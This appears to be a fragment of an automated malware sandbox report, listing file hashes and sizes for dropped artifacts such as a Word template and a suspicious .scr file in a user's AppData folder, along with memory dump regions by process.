128KB
MD5a763b170dd1ce80f6516574c7e5ec59e
SHA13d86105b3618fac2bb6f350898e71cc12d553e5f
SHA2565f71b59a7077f7a262fc22290e937d753f3eb32d2e52df0c1d2acc4f111354c2
SHA5128ac2b4d0605375b0698359d6def3ba69f4fb0ff30169cb956a5d774ed2d971812f93488e5566dd75f4c6545a97980445211db221039d44e11355b9240718eb57
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
20KB
MD52d3946735e9c4407280dae3f9240eb24
SHA10bc5819d4634e7ec0da3349a64b3101b5f0866b2
SHA256073673e31db96d8f22224483b265c90ccd550208939c2020caee9f5a4aa9af57
SHA51233691c07d96683bb5c243ae5cdc872c34ede3fa83aedaa0f246c5e7d2655e32eb704f8ab305a573198f2f4ee335fd6aa7b69f48264fbc4c4647fee6296ecadff
-
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lexFilesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
\Users\Admin\AppData\Roaming\nelb82019.scrFilesize
577KB
MD513049d0aa3d789f8b8951726527b1713
SHA1371c080cbf9425a1c8ad87050269e22e061c4f79
SHA2560eb63b2464eb65ad5c2dad2881dadeb3c50da801b1b6846c07710dbd4cfb4c9a
SHA512a899b15f7f7466eee28459cc62e6a75b1294f760cda97cbd8b8b0c5affa2e4700a3c48d2a31c3a3a2c9deb26de411a255fd9d56d6f9d98f2b40bb4f6fa17c04e
-
memory/272-135-0x0000000000400000-0x000000000042F000-memory.dmpFilesize
188KB
-
memory/272-134-0x000000007EFDE000-0x000000007EFDF000-memory.dmpFilesize
4KB
-
memory/272-130-0x0000000000400000-0x000000000042F000-memory.dmpFilesize
188KB
-
memory/272-132-0x0000000000400000-0x000000000042F000-memory.dmpFilesize
188KB
-
memory/1208-138-0x0000000000240000-0x0000000000340000-memory.dmpFilesize
1024KB
-
memory/1208-156-0x0000000006210000-0x00000000062F5000-memory.dmpFilesize
916KB
-
memory/1312-0-0x000000002F341000-0x000000002F342000-memory.dmpFilesize
4KB
-
memory/1312-2-0x000000007180D000-0x0000000071818000-memory.dmpFilesize
44KB
-
memory/1312-153-0x000000007180D000-0x0000000071818000-memory.dmpFilesize
44KB
-
memory/1312-1-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1312-186-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1312-187-0x000000007180D000-0x0000000071818000-memory.dmpFilesize
44KB
-
memory/1824-129-0x00000000002D0000-0x00000000002D8000-memory.dmpFilesize
32KB
-
memory/1824-124-0x0000000000780000-0x00000000007E2000-memory.dmpFilesize
392KB
-
memory/1824-123-0x00000000000B0000-0x0000000000146000-memory.dmpFilesize
600KB
-
memory/2716-148-0x0000000000B20000-0x0000000000B3C000-memory.dmpFilesize
112KB
-
memory/2716-149-0x0000000000080000-0x00000000000AF000-memory.dmpFilesize
188KB